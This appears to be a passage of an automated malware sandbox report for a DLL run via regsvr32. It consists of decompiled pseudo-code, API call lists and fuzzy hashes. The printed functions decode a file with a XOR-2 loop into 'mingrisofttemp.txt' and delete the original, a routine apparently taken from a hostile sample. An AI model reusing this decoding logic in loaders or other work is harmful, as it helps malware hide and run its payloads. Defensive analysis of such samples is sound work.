                                                                                                                • GetDC.USER32(00000000), ref: 1002D0AC
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 1002D0BD
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002D0C5
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 1002D0CD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                • String ID:
                                                                                                                • API String ID: 1151147025-0
                                                                                                                • Opcode ID: 1c82e98017bda58a1abb89799ae7cbf339beabb8b037c5e193e580e13ff8a8a9
                                                                                                                • Instruction ID: 241fd660cf793db7d5212e0abc6a079d6f19d4d6d69d71045c6bd073ba767a1b
                                                                                                                • Opcode Fuzzy Hash: 1c82e98017bda58a1abb89799ae7cbf339beabb8b037c5e193e580e13ff8a8a9
                                                                                                                • Instruction Fuzzy Hash: 9AF0D671A40714AFF720AF719C89F277BA4EB85B51F11461AF6419B1D0DBB5D8018F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E100038E0(intOrPtr __ecx, void* __edx) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t108;
                                                                                                                				signed int _t109;
                                                                                                                				intOrPtr* _t111;
                                                                                                                				intOrPtr* _t115;
                                                                                                                				void* _t120;
                                                                                                                				signed int _t124;
                                                                                                                				void* _t130;
                                                                                                                				signed int _t138;
                                                                                                                				signed int _t141;
                                                                                                                				signed int _t147;
                                                                                                                				signed int** _t154;
                                                                                                                				signed int** _t155;
                                                                                                                				signed int _t159;
                                                                                                                				char* _t161;
                                                                                                                				signed int _t173;
                                                                                                                				CHAR* _t180;
                                                                                                                				void* _t182;
                                                                                                                				signed int _t236;
                                                                                                                				signed int _t247;
                                                                                                                				signed int _t251;
                                                                                                                				signed int _t253;
                                                                                                                				signed int _t256;
                                                                                                                				intOrPtr _t260;
                                                                                                                				void* _t261;
                                                                                                                				void* _t263;
                                                                                                                				signed int _t265;
                                                                                                                				intOrPtr _t266;
                                                                                                                				void* _t267;
                                                                                                                				signed int _t268;
                                                                                                                				void* _t270;
                                                                                                                				intOrPtr _t272;
                                                                                                                				void* _t273;
                                                                                                                				intOrPtr* _t276;
                                                                                                                				intOrPtr* _t278;
                                                                                                                
                                                                                                                				_t268 = _t270 - 0x204;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10050F18);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t272 = _t270 - 0x1b4;
                                                                                                                				_t108 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_t109 = _t108 ^ _t268;
                                                                                                                				 *(_t268 + 0x200) = _t109;
                                                                                                                				_push(_t109);
                                                                                                                				 *[fs:0x0] = _t268 - 0xc;
                                                                                                                				 *((intOrPtr*)(_t268 - 0x10)) = _t272;
                                                                                                                				_t260 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t268 - 0x24)) = __ecx;
                                                                                                                				_t111 = E100173A6();
                                                                                                                				_t276 = _t111;
                                                                                                                				_t185 = 0 | _t276 == 0x00000000;
                                                                                                                				if(_t276 == 0) {
                                                                                                                					_t111 = E10001000(_t185, __edx, 0x80004005);
                                                                                                                				}
                                                                                                                				_t244 =  *_t111;
                                                                                                                				 *(_t268 - 0x14) =  *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0xc))))() + 0x10;
                                                                                                                				 *(_t268 - 4) = 0;
                                                                                                                				_t115 = E100173A6();
                                                                                                                				_t278 = _t115;
                                                                                                                				_t188 = 0 | _t278 == 0x00000000;
                                                                                                                				if(_t278 == 0) {
                                                                                                                					_t115 = E10001000(_t188, _t244, 0x80004005);
                                                                                                                				}
                                                                                                                				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *_t115 + 0xc))))() + 0x10; // 0x10
                                                                                                                				_t263 = _t14;
                                                                                                                				 *(_t268 - 0x20) = _t263;
                                                                                                                				 *(_t268 - 4) = 1;
                                                                                                                				E1001ADCC(_t260 + 0x78, _t260, _t268 - 0x14);
                                                                                                                				if( *((intOrPtr*)( *(_t268 - 0x14) - 0xc)) != 0) {
                                                                                                                					_t247 = _t268 - 0x20;
                                                                                                                					E10003500(_t247, "%smingrisofttemp.txt",  *((intOrPtr*)(_t260 + 0x74)));
                                                                                                                					_t180 =  *(_t268 - 0x20);
                                                                                                                					_t273 = _t272 + 0xc;
                                                                                                                					_t120 = CreateFileA(_t180, 0x40000000, 2, 0, 1, 0x80, 0);
                                                                                                                					__eflags = _t120;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						CloseHandle(_t120);
                                                                                                                					}
                                                                                                                					E100205E2(_t268 - 0x34, __eflags);
                                                                                                                					 *(_t268 - 4) = 2;
                                                                                                                					E100205E2(_t268 - 0x44, __eflags);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push( *(_t268 - 0x14));
                                                                                                                					 *(_t268 - 4) = 3;
                                                                                                                					_t124 = E10020A24(_t268 - 0x34, _t247, __eflags);
                                                                                                                					_push(0);
                                                                                                                					_push(0x1002);
                                                                                                                					_push(_t180);
                                                                                                                					_t264 = _t124;
                                                                                                                					E10020A24(_t268 - 0x44, _t247, __eflags);
                                                                                                                					__eflags = _t124;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						do {
                                                                                                                							E1003BB70(_t260, _t268 + 0x180, 0, 0x80);
                                                                                                                							E1003BB70(_t260, _t268 + 0x100, 0, 0x80);
                                                                                                                							_t273 = _t273 + 0x18;
                                                                                                                							_t265 = E100202F0(_t268 - 0x34, _t268 + 0x180, 0x80);
                                                                                                                							_t130 = 0;
                                                                                                                							__eflags = _t265;
                                                                                                                							if(_t265 > 0) {
                                                                                                                								do {
                                                                                                                									 *(_t268 + _t130 + 0x100) =  *(_t268 + _t130 + 0x180) ^ 0x00000002;
                                                                                                                									_t130 = _t130 + 1;
                                                                                                                									__eflags = _t130 - _t265;
                                                                                                                								} while (_t130 < _t265);
                                                                                                                							}
                                                                                                                							E10020330(_t268 - 0x44, _t268 + 0x100, _t265);
                                                                                                                							__eflags = _t265;
                                                                                                                						} while (_t265 != 0);
                                                                                                                						E10020580(_t180, _t268 - 0x34);
                                                                                                                						E10020580(_t180, _t268 - 0x44);
                                                                                                                						_t249 =  *(_t268 - 0x14);
                                                                                                                						DeleteFileA( *(_t268 - 0x14));
                                                                                                                						E1003BB37(_t180,  *(_t268 - 0x14));
                                                                                                                						E1002181C(_t180, _t260, _t265, __eflags, 0x10056fd8, _t265, _t265);
                                                                                                                						_t138 = E100173A6();
                                                                                                                						__eflags = _t138;
                                                                                                                						_t204 = 0 | __eflags != 0x00000000;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t138 = E10001000(_t204, _t249, 0x80004005);
                                                                                                                						}
                                                                                                                						_t250 =  *_t138;
                                                                                                                						_t54 =  *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0xc))))() + 0x10; // 0x10
                                                                                                                						_t266 = _t54;
                                                                                                                						 *((intOrPtr*)(_t268 - 0x1c)) = _t266;
                                                                                                                						 *(_t268 - 4) = 4;
                                                                                                                						_t141 = E100173A6();
                                                                                                                						__eflags = _t141;
                                                                                                                						_t207 = 0 | __eflags != 0x00000000;
                                                                                                                						__eflags = __eflags != 0;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t141 = E10001000(_t207, _t250, 0x80004005);
                                                                                                                						}
                                                                                                                						_t251 =  *_t141;
                                                                                                                						 *(_t268 - 0x18) =  *((intOrPtr*)( *((intOrPtr*)(_t251 + 0xc))))() + 0x10;
                                                                                                                						 *(_t268 - 4) = 5;
                                                                                                                						E100222BB(_t268 - 0x58, __eflags);
                                                                                                                						 *(_t268 - 4) = 7;
                                                                                                                						__eflags = L100222D1(_t268 - 0x58, _t251,  *(_t268 - 0x14), 0, 0);
                                                                                                                						if(__eflags != 0) {
                                                                                                                							 *(_t268 - 4) = 6;
                                                                                                                							_push(_t268 - 0x18);
                                                                                                                							_t147 = E100227E5(_t268 - 0x58, _t251, __eflags);
                                                                                                                							__eflags = _t147;
                                                                                                                							if(_t147 != 0) {
                                                                                                                								do {
                                                                                                                									E10003480(4, _t268 - 0x1c, _t260, _t266, _t268,  *(_t268 - 0x18),  *((intOrPtr*)( *(_t268 - 0x18) - 0xc)));
                                                                                                                									E10003480(4, _t268 - 0x1c, _t260, _t266, _t268, 0x10056fb0, 2);
                                                                                                                									_t251 = _t268 - 0x18;
                                                                                                                									_push(_t251);
                                                                                                                									_t173 = E100227E5(_t268 - 0x58, _t251, __eflags);
                                                                                                                									__eflags = _t173;
                                                                                                                								} while (_t173 != 0);
                                                                                                                								_t266 =  *((intOrPtr*)(_t268 - 0x1c));
                                                                                                                							}
                                                                                                                							E1001D2C4(E1001D1C2(_t260, 0x41e), _t266);
                                                                                                                							E1001D2C4(_t260 + 0x78,  *(_t268 - 0x14));
                                                                                                                							 *(_t268 - 4) = 5;
                                                                                                                							E100226B2(4, _t268 - 0x58, _t251, _t260, _t266, __eflags);
                                                                                                                							_t154 =  *(_t268 - 0x18) + 0xfffffff0;
                                                                                                                							 *(_t268 - 4) = 4;
                                                                                                                							asm("lock xadd [ecx], edx");
                                                                                                                							_t253 = (_t251 | 0xffffffff) - 1;
                                                                                                                							__eflags = _t253;
                                                                                                                						} else {
                                                                                                                							_t236 = _t268 - 0x58;
                                                                                                                							 *(_t268 - 4) = 5;
                                                                                                                							E100226B2(4, _t236, _t251, _t260, _t266, __eflags);
                                                                                                                							_t154 =  *(_t268 - 0x18) + 0xfffffff0;
                                                                                                                							 *(_t268 - 4) = 4;
                                                                                                                							_t253 =  &(_t154[3]);
                                                                                                                							asm("lock xadd [edx], ecx");
                                                                                                                							__eflags = (_t236 | 0xffffffff) - 1;
                                                                                                                						}
                                                                                                                						if(__eflags <= 0) {
                                                                                                                							_t253 =  *( *_t154);
                                                                                                                							 *((intOrPtr*)( *((intOrPtr*)(_t253 + 4))))(_t154);
                                                                                                                						}
                                                                                                                						_t89 = _t266 - 0x10; // 0x0
                                                                                                                						_t155 = _t89;
                                                                                                                						 *(_t268 - 4) = 3;
                                                                                                                						asm("lock xadd [ecx], edx");
                                                                                                                						_t247 = (_t253 | 0xffffffff) - 1;
                                                                                                                						__eflags = _t247;
                                                                                                                						if(__eflags <= 0) {
                                                                                                                							_t247 =  *( *_t155);
                                                                                                                							 *((intOrPtr*)( *((intOrPtr*)(_t247 + 4))))(_t155);
                                                                                                                						}
                                                                                                                						 *(_t268 - 4) = 2;
                                                                                                                						E100206EF(4, _t268 - 0x44, _t247, _t260, _t266, __eflags);
                                                                                                                						 *(_t268 - 4) = 1;
                                                                                                                						E100206EF(4, _t268 - 0x34, _t247, _t260, _t266, __eflags);
                                                                                                                						_t159 =  &(( *(_t268 - 0x20))[0xfffffffffffffff0]);
                                                                                                                						__eflags = _t159;
                                                                                                                					} else {
                                                                                                                						 *(_t268 - 4) = 2;
                                                                                                                						E100206EF(_t180, _t268 - 0x44, _t247, _t260, _t264, __eflags);
                                                                                                                						 *(_t268 - 4) = 1;
                                                                                                                						E100206EF(_t180, _t268 - 0x34, _t247, _t260, _t264, __eflags);
                                                                                                                						_t159 = _t180 - 0x10;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t21 = _t263 - 0x10; // 0x0
                                                                                                                					_t159 = _t21;
                                                                                                                				}
                                                                                                                				 *(_t268 - 4) = 0;
                                                                                                                				asm("lock xadd [ecx], edx");
                                                                                                                				_t256 = (_t247 | 0xffffffff) - 1;
                                                                                                                				if(_t256 <= 0) {
                                                                                                                					_t256 =  *( *_t159);
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4))))(_t159);
                                                                                                                				}
                                                                                                                				_t161 =  &(( *(_t268 - 0x14))[0xfffffffffffffff0]);
                                                                                                                				 *(_t268 - 4) = 0xffffffff;
                                                                                                                				asm("lock xadd [ecx], edx");
                                                                                                                				_t258 = (_t256 | 0xffffffff) - 1;
                                                                                                                				if((_t256 | 0xffffffff) - 1 <= 0) {
                                                                                                                					_t258 =  *( *_t161);
                                                                                                                					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *( *_t161) + 4))))(_t161);
                                                                                                                				}
                                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t268 - 0xc));
                                                                                                                				_pop(_t261);
                                                                                                                				_pop(_t267);
                                                                                                                				_pop(_t182);
                                                                                                                				return E1003B437(_t161, _t182,  *(_t268 + 0x200) ^ _t268, _t258, _t261, _t267);
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000001,00000080,00000000), ref: 100039C6
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 100039D1
                                                                                                                • _memset.LIBCMT ref: 10003A43
                                                                                                                • _memset.LIBCMT ref: 10003A56
                                                                                                                • DeleteFileA.KERNEL32(?,?,00001002,00000000,?,00000000,00000000), ref: 10003AC0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File_memset$CloseCreateDeleteHandle
                                                                                                                • String ID: %smingrisofttemp.txt
                                                                                                                • API String ID: 3034448655-1600845768
                                                                                                                • Opcode ID: 8817c8e526d20c4fded9e5c1c55b0340626e69d5f3df592bf684f53e300378a9
                                                                                                                • Instruction ID: 67305b9a490d361d465055531ef015304d1f88d920b89ff78f097a6eb4034f25
                                                                                                                • Opcode Fuzzy Hash: 8817c8e526d20c4fded9e5c1c55b0340626e69d5f3df592bf684f53e300378a9
                                                                                                                • Instruction Fuzzy Hash: 11C1B135A00645AFEB05DBA8CC56FEEB7B8FF44350F148258F515AB2D6DB70AA04CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E10003D10(intOrPtr __ecx, void* __edx) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t108;
                                                                                                                				signed int _t109;
                                                                                                                				intOrPtr* _t111;
                                                                                                                				intOrPtr* _t115;
                                                                                                                				void* _t120;
                                                                                                                				signed int _t124;
                                                                                                                				void* _t130;
                                                                                                                				signed int _t138;
                                                                                                                				signed int _t141;
                                                                                                                				signed int _t147;
                                                                                                                				signed int** _t154;
                                                                                                                				signed int** _t155;
                                                                                                                				signed int _t159;
                                                                                                                				char* _t161;
                                                                                                                				signed int _t173;
                                                                                                                				CHAR* _t180;
                                                                                                                				void* _t182;
                                                                                                                				signed int _t236;
                                                                                                                				signed int _t247;
                                                                                                                				signed int _t251;
                                                                                                                				signed int _t253;
                                                                                                                				signed int _t256;
                                                                                                                				intOrPtr _t260;
                                                                                                                				void* _t261;
                                                                                                                				void* _t263;
                                                                                                                				signed int _t265;
                                                                                                                				intOrPtr _t266;
                                                                                                                				void* _t267;
                                                                                                                				signed int _t268;
                                                                                                                				void* _t270;
                                                                                                                				intOrPtr _t272;
                                                                                                                				void* _t273;
                                                                                                                				intOrPtr* _t276;
                                                                                                                				intOrPtr* _t278;
                                                                                                                
                                                                                                                				_t268 = _t270 - 0x204;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10050F78);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t272 = _t270 - 0x1b4;
                                                                                                                				_t108 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_t109 = _t108 ^ _t268;
                                                                                                                				 *(_t268 + 0x200) = _t109;
                                                                                                                				_push(_t109);
                                                                                                                				 *[fs:0x0] = _t268 - 0xc;
                                                                                                                				 *((intOrPtr*)(_t268 - 0x10)) = _t272;
                                                                                                                				_t260 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t268 - 0x24)) = __ecx;
                                                                                                                				_t111 = E100173A6();
                                                                                                                				_t276 = _t111;
                                                                                                                				_t185 = 0 | _t276 == 0x00000000;
                                                                                                                				if(_t276 == 0) {
                                                                                                                					_t111 = E10001000(_t185, __edx, 0x80004005);
                                                                                                                				}
                                                                                                                				_t244 =  *_t111;
                                                                                                                				 *(_t268 - 0x14) =  *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0xc))))() + 0x10;
                                                                                                                				 *(_t268 - 4) = 0;
                                                                                                                				_t115 = E100173A6();
                                                                                                                				_t278 = _t115;
                                                                                                                				_t188 = 0 | _t278 == 0x00000000;
                                                                                                                				if(_t278 == 0) {
                                                                                                                					_t115 = E10001000(_t188, _t244, 0x80004005);
                                                                                                                				}
                                                                                                                				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *_t115 + 0xc))))() + 0x10; // 0x10
                                                                                                                				_t263 = _t14;
                                                                                                                				 *(_t268 - 0x20) = _t263;
                                                                                                                				 *(_t268 - 4) = 1;
                                                                                                                				E1001ADCC(_t260 + 0x78, _t260, _t268 - 0x14);
                                                                                                                				if( *((intOrPtr*)( *(_t268 - 0x14) - 0xc)) != 0) {
                                                                                                                					_t247 = _t268 - 0x20;
                                                                                                                					E10003500(_t247, "%smingrisofttemp.txt",  *((intOrPtr*)(_t260 + 0x74)));
                                                                                                                					_t180 =  *(_t268 - 0x20);
                                                                                                                					_t273 = _t272 + 0xc;
                                                                                                                					_t120 = CreateFileA(_t180, 0x40000000, 2, 0, 1, 0x80, 0);
                                                                                                                					__eflags = _t120;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						CloseHandle(_t120);
                                                                                                                					}
                                                                                                                					E100205E2(_t268 - 0x34, __eflags);
                                                                                                                					 *(_t268 - 4) = 2;
                                                                                                                					E100205E2(_t268 - 0x44, __eflags);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push( *(_t268 - 0x14));
                                                                                                                					 *(_t268 - 4) = 3;
                                                                                                                					_t124 = E10020A24(_t268 - 0x34, _t247, __eflags);
                                                                                                                					_push(0);
                                                                                                                					_push(0x1002);
                                                                                                                					_push(_t180);
                                                                                                                					_t264 = _t124;
                                                                                                                					E10020A24(_t268 - 0x44, _t247, __eflags);
                                                                                                                					__eflags = _t124;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						do {
                                                                                                                							E1003BB70(_t260, _t268 + 0x180, 0, 0x80);
                                                                                                                							E1003BB70(_t260, _t268 + 0x100, 0, 0x80);
                                                                                                                							_t273 = _t273 + 0x18;
                                                                                                                							_t265 = E100202F0(_t268 - 0x34, _t268 + 0x180, 0x80);
                                                                                                                							_t130 = 0;
                                                                                                                							__eflags = _t265;
                                                                                                                							if(_t265 > 0) {
                                                                                                                								do {
                                                                                                                									 *(_t268 + _t130 + 0x100) =  *(_t268 + _t130 + 0x180) ^ 0x00000002;
                                                                                                                									_t130 = _t130 + 1;
                                                                                                                									__eflags = _t130 - _t265;
                                                                                                                								} while (_t130 < _t265);
                                                                                                                							}
                                                                                                                							E10020330(_t268 - 0x44, _t268 + 0x100, _t265);
                                                                                                                							__eflags = _t265;
                                                                                                                						} while (_t265 != 0);
                                                                                                                						E10020580(_t180, _t268 - 0x34);
                                                                                                                						E10020580(_t180, _t268 - 0x44);
                                                                                                                						_t249 =  *(_t268 - 0x14);
                                                                                                                						DeleteFileA( *(_t268 - 0x14));
                                                                                                                						E1003BB37(_t180,  *(_t268 - 0x14));
                                                                                                                						E1002181C(_t180, _t260, _t265, __eflags, 0x10056ffc, _t265, _t265);
                                                                                                                						_t138 = E100173A6();
                                                                                                                						__eflags = _t138;
                                                                                                                						_t204 = 0 | __eflags != 0x00000000;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t138 = E10001000(_t204, _t249, 0x80004005);
                                                                                                                						}
                                                                                                                						_t250 =  *_t138;
                                                                                                                						_t54 =  *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0xc))))() + 0x10; // 0x10
                                                                                                                						_t266 = _t54;
                                                                                                                						 *((intOrPtr*)(_t268 - 0x1c)) = _t266;
                                                                                                                						 *(_t268 - 4) = 4;
                                                                                                                						_t141 = E100173A6();
                                                                                                                						__eflags = _t141;
                                                                                                                						_t207 = 0 | __eflags != 0x00000000;
                                                                                                                						__eflags = __eflags != 0;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t141 = E10001000(_t207, _t250, 0x80004005);
                                                                                                                						}
                                                                                                                						_t251 =  *_t141;
                                                                                                                						 *(_t268 - 0x18) =  *((intOrPtr*)( *((intOrPtr*)(_t251 + 0xc))))() + 0x10;
                                                                                                                						 *(_t268 - 4) = 5;
                                                                                                                						E100222BB(_t268 - 0x58, __eflags);
                                                                                                                						 *(_t268 - 4) = 7;
                                                                                                                						__eflags = L100222D1(_t268 - 0x58, _t251,  *(_t268 - 0x14), 0, 0);
                                                                                                                						if(__eflags != 0) {
                                                                                                                							 *(_t268 - 4) = 6;
                                                                                                                							_push(_t268 - 0x18);
                                                                                                                							_t147 = E100227E5(_t268 - 0x58, _t251, __eflags);
                                                                                                                							__eflags = _t147;
                                                                                                                							if(_t147 != 0) {
                                                                                                                								do {
                                                                                                                									E10003480(4, _t268 - 0x1c, _t260, _t266, _t268,  *(_t268 - 0x18),  *((intOrPtr*)( *(_t268 - 0x18) - 0xc)));
                                                                                                                									E10003480(4, _t268 - 0x1c, _t260, _t266, _t268, 0x10056fb0, 2);
                                                                                                                									_t251 = _t268 - 0x18;
                                                                                                                									_push(_t251);
                                                                                                                									_t173 = E100227E5(_t268 - 0x58, _t251, __eflags);
                                                                                                                									__eflags = _t173;
                                                                                                                								} while (_t173 != 0);
                                                                                                                								_t266 =  *((intOrPtr*)(_t268 - 0x1c));
                                                                                                                							}
                                                                                                                							E1001D2C4(E1001D1C2(_t260, 0x41e), _t266);
                                                                                                                							E1001D2C4(_t260 + 0x78,  *(_t268 - 0x14));
                                                                                                                							 *(_t268 - 4) = 5;
                                                                                                                							E100226B2(4, _t268 - 0x58, _t251, _t260, _t266, __eflags);
                                                                                                                							_t154 =  *(_t268 - 0x18) + 0xfffffff0;
                                                                                                                							 *(_t268 - 4) = 4;
                                                                                                                							asm("lock xadd [ecx], edx");
                                                                                                                							_t253 = (_t251 | 0xffffffff) - 1;
                                                                                                                							__eflags = _t253;
                                                                                                                						} else {
                                                                                                                							_t236 = _t268 - 0x58;
                                                                                                                							 *(_t268 - 4) = 5;
                                                                                                                							E100226B2(4, _t236, _t251, _t260, _t266, __eflags);
                                                                                                                							_t154 =  *(_t268 - 0x18) + 0xfffffff0;
                                                                                                                							 *(_t268 - 4) = 4;
                                                                                                                							_t253 =  &(_t154[3]);
                                                                                                                							asm("lock xadd [edx], ecx");
                                                                                                                							__eflags = (_t236 | 0xffffffff) - 1;
                                                                                                                						}
                                                                                                                						if(__eflags <= 0) {
                                                                                                                							_t253 =  *( *_t154);
                                                                                                                							 *((intOrPtr*)( *((intOrPtr*)(_t253 + 4))))(_t154);
                                                                                                                						}
                                                                                                                						_t89 = _t266 - 0x10; // 0x0
                                                                                                                						_t155 = _t89;
                                                                                                                						 *(_t268 - 4) = 3;
                                                                                                                						asm("lock xadd [ecx], edx");
                                                                                                                						_t247 = (_t253 | 0xffffffff) - 1;
                                                                                                                						__eflags = _t247;
                                                                                                                						if(__eflags <= 0) {
                                                                                                                							_t247 =  *( *_t155);
                                                                                                                							 *((intOrPtr*)( *((intOrPtr*)(_t247 + 4))))(_t155);
                                                                                                                						}
                                                                                                                						 *(_t268 - 4) = 2;
                                                                                                                						E100206EF(4, _t268 - 0x44, _t247, _t260, _t266, __eflags);
                                                                                                                						 *(_t268 - 4) = 1;
                                                                                                                						E100206EF(4, _t268 - 0x34, _t247, _t260, _t266, __eflags);
                                                                                                                						_t159 =  &(( *(_t268 - 0x20))[0xfffffffffffffff0]);
                                                                                                                						__eflags = _t159;
                                                                                                                					} else {
                                                                                                                						 *(_t268 - 4) = 2;
                                                                                                                						E100206EF(_t180, _t268 - 0x44, _t247, _t260, _t264, __eflags);
                                                                                                                						 *(_t268 - 4) = 1;
                                                                                                                						E100206EF(_t180, _t268 - 0x34, _t247, _t260, _t264, __eflags);
                                                                                                                						_t159 = _t180 - 0x10;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t21 = _t263 - 0x10; // 0x0
                                                                                                                					_t159 = _t21;
                                                                                                                				}
                                                                                                                				 *(_t268 - 4) = 0;
                                                                                                                				asm("lock xadd [ecx], edx");
                                                                                                                				_t256 = (_t247 | 0xffffffff) - 1;
                                                                                                                				if(_t256 <= 0) {
                                                                                                                					_t256 =  *( *_t159);
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4))))(_t159);
                                                                                                                				}
                                                                                                                				_t161 =  &(( *(_t268 - 0x14))[0xfffffffffffffff0]);
                                                                                                                				 *(_t268 - 4) = 0xffffffff;
                                                                                                                				asm("lock xadd [ecx], edx");
                                                                                                                				_t258 = (_t256 | 0xffffffff) - 1;
                                                                                                                				if((_t256 | 0xffffffff) - 1 <= 0) {
                                                                                                                					_t258 =  *( *_t161);
                                                                                                                					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *( *_t161) + 4))))(_t161);
                                                                                                                				}
                                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t268 - 0xc));
                                                                                                                				_pop(_t261);
                                                                                                                				_pop(_t267);
                                                                                                                				_pop(_t182);
                                                                                                                				return E1003B437(_t161, _t182,  *(_t268 + 0x200) ^ _t268, _t258, _t261, _t267);
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000001,00000080,00000000), ref: 10003DF6
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10003E01
                                                                                                                • _memset.LIBCMT ref: 10003E73
                                                                                                                • _memset.LIBCMT ref: 10003E86
                                                                                                                • DeleteFileA.KERNEL32(?,?,00001002,00000000,?,00000000,00000000), ref: 10003EF0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File_memset$CloseCreateDeleteHandle
                                                                                                                • String ID: %smingrisofttemp.txt
                                                                                                                • API String ID: 3034448655-1600845768
                                                                                                                • Opcode ID: f89dcb604309794579d6de992991a3d4f8310fefd3ec1bcbd63f55cd254091b4
                                                                                                                • Instruction ID: a47a00b9d9cd77ccd803d6ac4688e9de417d713599904eb0560c35611f0cdbec
                                                                                                                • Opcode Fuzzy Hash: f89dcb604309794579d6de992991a3d4f8310fefd3ec1bcbd63f55cd254091b4
                                                                                                                • Instruction Fuzzy Hash: FEC1B175900245AFEB05DBA8CC52FEEB7B5EF44350F108258F515AB2D6DB30AA04CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 62%
                                                                                                                			E1002994E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t133;
                                                                                                                				intOrPtr* _t140;
                                                                                                                				int _t145;
                                                                                                                				signed short _t148;
                                                                                                                				short* _t149;
                                                                                                                				intOrPtr _t152;
                                                                                                                				signed short _t177;
                                                                                                                				intOrPtr _t178;
                                                                                                                				signed int _t179;
                                                                                                                				intOrPtr _t184;
                                                                                                                				struct tagRECT _t189;
                                                                                                                				int _t190;
                                                                                                                				void* _t191;
                                                                                                                				signed short _t193;
                                                                                                                				signed short _t194;
                                                                                                                				void* _t195;
                                                                                                                				void* _t221;
                                                                                                                				intOrPtr _t225;
                                                                                                                				short _t226;
                                                                                                                				intOrPtr* _t233;
                                                                                                                				void* _t234;
                                                                                                                				signed short* _t236;
                                                                                                                				signed int _t240;
                                                                                                                				void* _t241;
